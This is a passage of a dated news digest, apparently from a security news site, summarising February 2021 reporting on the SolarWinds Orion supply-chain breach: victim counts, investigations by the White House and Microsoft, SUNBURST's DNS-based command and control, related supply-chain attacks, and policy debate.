SolarWinds breach targeted 100 companies and took months of preparation

A White House team leading the investigation into the SolarWinds hack is worried that the breach of 100 US companies has the potential to make the initial compromise much more serious threat in the future. Anne Neuberger, deputy national security advisor for Cyber and Emerging Technology at the White House, said in a press briefing that nine government agencies were breached while many of the 100 private sector US organizations that were breached were technology companies.

Ref - ZDNet

_______________________________________________________________________________________

(February 18, 2021)


Efficacy of SolarWinds attack 

The sheer sophistication of the SolarWinds incident is fascinating. At a technical level, it is a multilayered infiltration involving custom malicious tooling, backdoors, and cloaked code, far beyond the skill of script kiddies so often seen exploiting more obvious errors. In addition, it was carried out with code that looked completely benign.


_______________________________________________________________________________________

(February 18, 2021)


White House planning for an executive action after SolarWinds hack

In an update on the investigation into the SolarWinds supply chain attack, Deputy National Security Adviser Anne Neuberger said that the Biden administration is preparing "executive action" to address security shortcomings that have come to light. Neuberger, who was recently named coordinator of the investigation into the attack, made her comments at a White House press briefing.


_______________________________________________________________________________________

(February 18, 2021)


SolarWinds attackers studied Azure’s secret source code

The hackers behind the worst intrusion of U.S. government agencies in years gained access to Microsoft's secret source code for authenticating customers, one of the biggest vectors used in the attacks. Microsoft revealed that its internal investigation had found that the hackers studied parts of the source code instructions for its Azure cloud programs related to identity and security, its Exchange email programs, and Intune management for mobile devices and applications.

Ref - Dell

_______________________________________________________________________________________

(February 18, 2021)


Learnings for the financial services sector from the SolarWinds attacks

The SolarWinds cyber-attack includes some important lessons for financial services institutions of all sizes. A key factor in avoiding a SolarWinds-style breach is operational resilience, which itself depends on having the right strategy. It is crucial to validate the security controls in place and test how effective they are. For this, the financial firms need a SOC that understands the system and monitors the threats, including what type of cyber-attack would be a disaster for the business.


_______________________________________________________________________________________

(February 18, 2020)


The debate on retaliation to SolarWinds breach

Reports came under fire from many infosec professionals, who criticized arguments in favor of launching offensive cyberattacks, also known as hacking back, against SolarWinds breach adversaries. Many infosec experts have warned that hacking back carries enormous risk and should not be part of U.S. cybersecurity policy.


_______________________________________________________________________________________

(February 18, 2021)


Did SolarWinds hack include voice, video, and messaging platforms?

While investigations regarding SolarWinds are ongoing and new information is being revealed on a near-daily basis, there are some concerns regarding any role of an advanced persistent threat to Voice, Video, and Messaging Platforms in SolarWinds attacks. These platforms usually include SIP traffic, APIs Remote Access, and RTC, and are in heavy use since the advent of COVID-19 epidemic. So any threats to these platforms may lead to another level of catastrophe.

Ref - Medium

_______________________________________________________________________________________

(February 18, 2021)


Hacker behind SolarWinds used U.S. networks

A sprawling cyber-attack that compromised popular software created by Texas-based SolarWinds Corp. was executed from within the U.S, according to a top White House official. The hackers launched the hack from inside the United States which further made it difficult for the U.S. government to observe their activity.

Ref - Bloomberg

_______________________________________________________________________________________

(February 17, 2021)


An 82% increase observed in SolarWinds-style vendor email compromise attack

Abnormal Security, a next-generation cloud email security company, released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.

Ref - Yahoo

_______________________________________________________________________________________

(February 17, 2021)


There could be 1,000 developers who had written malicious code used in the SolarWinds breach

Microsoft discovered that the SolarWinds breach was not a job of a small group of threat actors, instead, 1,000+ developers had worked on developing the malicious code in the first place. This implied that the attack was not just widespread but was developed and executed by a larger group.

Ref - CISOMAG

_______________________________________________________________________________________

(February 17, 2021)


Around 100 private organizations hit by SolarWinds attack

The deputy national security advisor for cyber and emerging technology confirmed that so far nine federal agencies and 100 private industry organizations have been compromised in the SolarWinds attacks. In addition, the attackers waged the attack from inside the US, making it difficult for the US government to observe their activity.


_______________________________________________________________________________________

(February 17, 2021)


Risk of SolarWinds-style attacks through vendor email compromise increased 82%

Abnormal Security has released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.

Ref - Yahoo 

_______________________________________________________________________________________

(February 16, 2021)


Importance of DNS security after SolarWinds breach

The SolarWinds attack underscores the importance of securing DNS traffic. DNS tunneling, where data is transmitted by appending it to recursive DNS queries, was chosen as the medium to steal customer data. Queries were sent to DNS command and control servers within the same region of breached enterprise networks to evade detection. 

Ref - Akamai

_______________________________________________________________________________________

(February 16, 2021)


Webroot recommendations after the SolarWinds attack

Webroot is advising tips to their MSP and small business customers after the SolarWinds hack. It includes the use of security technology that includes threat intelligence for URLs, IP addresses, and files as a layered cybersecurity approach. Organizations should make sure to follow best practices within policies, and ensure devices are set to block high-risk and suspicious objects based on real-time intelligence criteria. Also, consider adding DNS Protection to your technology stack to deepen your protection around malicious IP addresses and URLs that are frequently used in attacks.

Ref - Webroot 
 
_______________________________________________________________________________________

(February 16, 2021)


Analysis of SUNBURST malware

The analysis of SUNBURST malware by FireEye disclosed that: attackers hid malicious code within thousands of lines of legitimate code, compiled inside of digitally signed binaries. Attackers took advantage of a platform SolarWinds Orion for lateral movement traffic. They disabled dozens of endpoint security tools, including FireEye, and used DNS for Stage 1 and 2 C2 communications. They also introduced minimal custom malware into the environment post-exploitation, often “living off the land” via native Windows tools.

Ref - FireEye

_______________________________________________________________________________________

(February 16, 2021)


A new type of supply-chain attack hit MNCs including Apple and Microsoft

Security researcher Alex Birsan has unveiled a new technique called Dependency Confusion or namespace confusion attack, that can execute counterfeit code on networks belonging to some of the popular enterprise giants, including Apple, Microsoft, and Tesla. By giving the submissions the same package name as dependencies used by companies, Birsan was able to get these companies to download and install the counterfeit code, which could result in a SolarWinds-type supply chain attack.

Ref - Arstechnica 

_______________________________________________________________________________________

(February 16, 2021)


A SolarWinds-like cyberattack targeted Centreon, French researchers disclose

French cybersecurity authorities have disclosed a SolarWinds-like supply-chain attack targeting several major organizations by hackers by compromising the Centreon enterprise IT platform. The first evidence of the intrusion campaign dates back to 2017 with the attack lasting until 2020. This mostly affected IT providers, in particular, web hosting providers.

Ref - ITPro 

_______________________________________________________________________________________

(February 16, 2021)


Microsoft reveals new details about sophisticated mega-breach

Microsoft has made some new revelations regarding SolarWinds attacks, which is calling the cyber-attack the most sophisticated of all time. According to Brad Smith, Microsoft has hired 500 engineers to dig into the attack. Cyjax CISO Ian Thornton-Trump points out that attackers had one chance to get the malware into place to do its thing without revealing their compromise. Because if a build failed because of the malicious code, their sinister plot to infect Orion would be revealed.

Ref - Forbes 

_______________________________________________________________________________________

(February 15, 2021)


Many SolarWinds customers failed to secure even after the breach came to light 

Many companies still expose SolarWinds Orion to the internet and have failed to take action following the disclosure of the massive SolarWinds breach. RiskRecon, a firm specialized in risk assessment, observed 1,785 organizations exposing Orion to the internet on December 13, 2020, shortly after the breach came to light, and the number dropped to 1,330 by February 1, 2021. However, only 8% of these companies have applied the Orion update (2020.2.4) in response to the breach.


_______________________________________________________________________________________

(February 15, 2021)


Microsoft found 1,000-plus developers' fingerprints on the SolarWinds hack

Microsoft president Brad Smith says that their analysis of the SolarWinds hack suggests the code behind the crack was the work of a thousand or more developers. Smith didn’t say who those 1,000 developers worked for but compared the SolarWinds hack to attacks on Ukraine that had been widely attributed to Russia.


_______________________________________________________________________________________

(February 15, 2021)


SolarWinds hack is the largest and most sophisticated attack ever - Microsoft’s President

A hacking campaign that used a U.S. tech company as a springboard to compromise a raft of U.S. government agencies is the largest and most sophisticated attack the world has ever seen, according to Microsoft Corp’s president Brad Smith. The SolarWinds breach could have compromised up to 18,000 SolarWinds customers that used the company’s Orion network monitoring software. It could take months to identify the compromised systems and expel the hackers.

Ref - Reuters

_______________________________________________________________________________________

(February 14, 2021)


How Russian spies hacked the US federal agencies during SolarWinds attacks

Brad Smith, the president of Microsoft, has said that by looking at the sophistication of the SolarWinds attacks, it can be said that the attacker had an asymmetric advantage for somebody playing offense. And it is almost certainly possible that these attacks are still continuing. Kevin Mandia, CEO of FireEye, disclosed that intruders impersonated its employees snooping around inside their network, stealing FireEye's proprietary tools to test its client’s defenses and intelligence reports on active cyber threats.

Ref - CBS News 

_______________________________________________________________________________________

(February 14, 2021)


The SolarWinds attack could be still ongoing

The SolarWinds attack was unprecedented in audacity and scope and the Russian spies went rummaging through the digital files of the U.S. departments of Justice, State, Treasury, Energy, and Commerce. For nine months, they had unfettered access to top-level communications, court documents, even nuclear secrets. And by all accounts, it's still going on and hackers could still be stealing information.

Ref - CBS News

_______________________________________________________________________________________

(February 14, 2021)


The U.S. must strike back after SolarWinds breach

James Lewis, a director at the Center for Strategic and International Studies, said fear of escalation has held the U.S. back from punishing Russia, and other nation-states when they step out of line. He suggested the U.S. experiment with tactics to find creative ways of inflicting revenge on Russia.

Ref - CBS News

_______________________________________________________________________________________

(February 12, 2021)


CISOs' 2021 priorities after SolarWinds attack 

After the SolarWinds attack, CISOs will need to redraw contracts with third-party providers for software, hardware, and services to explicitly demand that the providers have a commitment to securing their own environments. This includes ensuring they use third-party static code analysis, regular security scanning of local and cloud-based environments, DevSecOps, and integrity check of codes. In addition, they must adopt the latest encryption and authentication technologies.


_______________________________________________________________________________________

(February 12, 2021)

US Court system is demanding a change into court documents storage after SolarWinds breach

Multiple U.S. senators have demanded a hearing on what court officials know about the hackers' access to sensitive filings. A number of courthouses are now uploading documents to a single computer. All 13 of the country's federal circuit courts have separate measures and rules they take to protect the security of documents filed, but now everything may need to change due to the attack.


_______________________________________________________________________________________

(February 12, 2021)


Orion servers exposed to Internet drop by 25% since SolarWinds breaches

One in four SolarWinds Orion servers exposed to the internet at the time of an era-defining espionage campaign has been taken off the internet. This could mean different things to different companies. Some may have put the servers inside of a firewall. Others may have found a replacement for SolarWinds. Yet others may have deactivated the servers during remediation.

Ref - SC Media 

_______________________________________________________________________________________

(February 12, 2021)


Russians outsmarted DHS cyberattack detection program in SolarWinds hack

From a software engineering perspective, the SolarWinds attack is probably the largest and most sophisticated attack the world has ever seen. The alleged Russian attackers had huge resources at their disposal, and probably more than 1,000 engineers worked on these attacks.

Ref - CBS News 

_______________________________________________________________________________________

(February 11, 2021)


Unanswered questions about SolarWinds breach

There is a considerable fear that the attackers behind the SolarWinds breach may have gained deep, persistent, and almost undetectable access on networks belonging to numerous organizations in sectors including manufacturing, industrial, construction, and logistics. The incident also resurfaced old concerns over supply chain vulnerabilities and some new ones over the ability of even the best security tools and controls to detect highly targeted attacks.


_______________________________________________________________________________________

(February 11, 2021)


New stats about suspicious network activity during peak of SUNBURST attack

ExtraHop threat researchers have found that between late March 2020 and early October 2020, detections of probable malicious activity increased by approximately 150 percent. Activity patterns outlined in the report indicate that the SUNBURST attackers were successful in flying under the radar of these detection methods either by disabling them or by redirecting their approach before they could be detected.

Ref - Yahoo 

_______________________________________________________________________________________

(February 11, 2021)


How suspected Chinese hackers compromised USDA’s National Finance Center

Chinese hackers exploited a disparate SolarWinds hack from the one exploited by Russian hackers to compromise the National Finance center under the U.S. Department of Agriculture (USDA). It is said that the suspected Chinese hacking incident affected only a single customer and that a security update was released in December 2020.

Ref - CPO Magazine 

_______________________________________________________________________________________

(February 10, 2021)


Maritime facilities using SolarWinds are ordered to report breaches

The U.S. Coast Guard (USCG) has ordered MTSA-regulated facilities and vessels using SolarWinds software for critical functions to report security breaches in case of suspicions of being affected by the SolarWinds supply-chain attack. USCG's order was delivered through a Marine Safety Information Bulletin published on continued awareness regarding the ongoing exploitation of SolarWinds software.


_______________________________________________________________________________________

(February 10, 2021)


A senior official is leading the inquiry into SolarWinds breach

The White House has announced that it has put a senior national security official in charge of the response to the broad Russian breach of government computers, only hours after the Democratic chairman of the Senate Intelligence Committee criticized the disjointed and disorganized response in the opening weeks of the Biden administration.


_______________________________________________________________________________________

(February 10, 2021)


SolarWinds breach showed that the U.S. is most targeted and vulnerable

The U.S. is one of the most advanced, if not the most advanced cyber superpower in the world, but it’s also most targeted and it’s most vulnerable. Part of the problem is that the U.S. has spent more energy on hacking other countries than on defending itself. This attack has hit the Department of Homeland Security — the very agency charged with keeping the US safe.

Ref - NPR

_______________________________________________________________________________________

(February 10, 2021)


More cyberattacks like SolarWinds could be expected from Russia

The federal government's former top cybersecurity official warned lawmakers that the SolarWinds Orion hack is likely not the worst attack the United States may see from Russia. The federal agencies investigating the attack as well as third-party cybersecurity experts have largely concurred the breach appears to be espionage.

Ref - FCW

_______________________________________________________________________________________

(February 10, 2021)


SolarWinds breach put the spotlight on supply chain attacks

The recent SolarWinds breach has proved how devastating a well-executed supply chain attack could be. The thing that sets this apart from other cases, is its peculiar victim profiling and validation scheme. Through the SolarWinds Orion IT packages, the attackers reached around 18,000 customers and stayed inside targeted victim’s networks for months without raising any alarms.

Ref - CSO

_______________________________________________________________________________________

(February 10, 2021)


Security of supply chains is actually worse than everyone thinks

There are several reasons that indicate that the security of supply chains is a worse state. Several enterprise networks consist of an untold number of disparate products, duct-taped together through poorly documented interfaces. Most have no clue they're sitting ducks for average attackers of moderate skill, much less nation state-backed adversaries with unlimited resources.

Ref - ZDNet

 _______________________________________________________________________________________

(February 9, 2021)


The encryption backdoor from 2015 could be behind the SolarWinds attacks

While it is still not clearly known how hackers altered the code of SolarWinds software, many point to the Juniper Networks 2015 incident as a precursor to the recent hack. In a letter addressed to the NSA, members of Congress questioned whether the agency knew about the encryption backdoor in the Juniper Networks products.

Ref - NordVPN 

_______________________________________________________________________________________

(February 9, 2021)


Lessons from SolarWinds attack for federal agencies

There are several lessons for the Federal agencies to take away from the recent SolarWinds attacks. This includes making sure of response that actually reduces risk (turning off security updates and patches won’t). It also makes sense to choose reputable, responsive suppliers that adhere to security standards and best practices. In addition, follow the least privilege and Zero Trust policy and protect sensitive data with adequate protection.

Ref - Varonis

_______________________________________________________________________________________

(February 9, 2021)


The U.S. must prioritize cybersecurity after the SolarWinds breach

The SolarWinds hack is considered an egregious act of espionage, stealing data, and establishing unauthorized access to information technology. Thus, nations must move past jurisdictional grandstanding to develop a national cybersecurity strategy. There must be a comprehensive approach to cybersecurity that keeps the United States a step ahead of its adversaries.

Ref - CNBC

_______________________________________________________________________________________

(February 9, 2021)


What could be the purpose behind the SolarWinds hack?

The purpose of the SolarWinds hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.


_______________________________________________________________________________________

(February 9, 2021)


SolarWinds breach has created disturbances for security worldwide

While the scope of Solorigate attack is substantial, the scale of sophisticated deception employed by malicious actors is even more significant. The SolarWinds security breach highlights the need to actively scan, monitor, and manage all software updates for organizations at the end of the digital development and supply pipeline, no matter where they come from or where they exist in the application stack.

Ref - Forbes 

_______________________________________________________________________________________

(February 9, 2021)


The SolarWinds hack was not inevitable

The SolarWinds hack was a major breach of national security th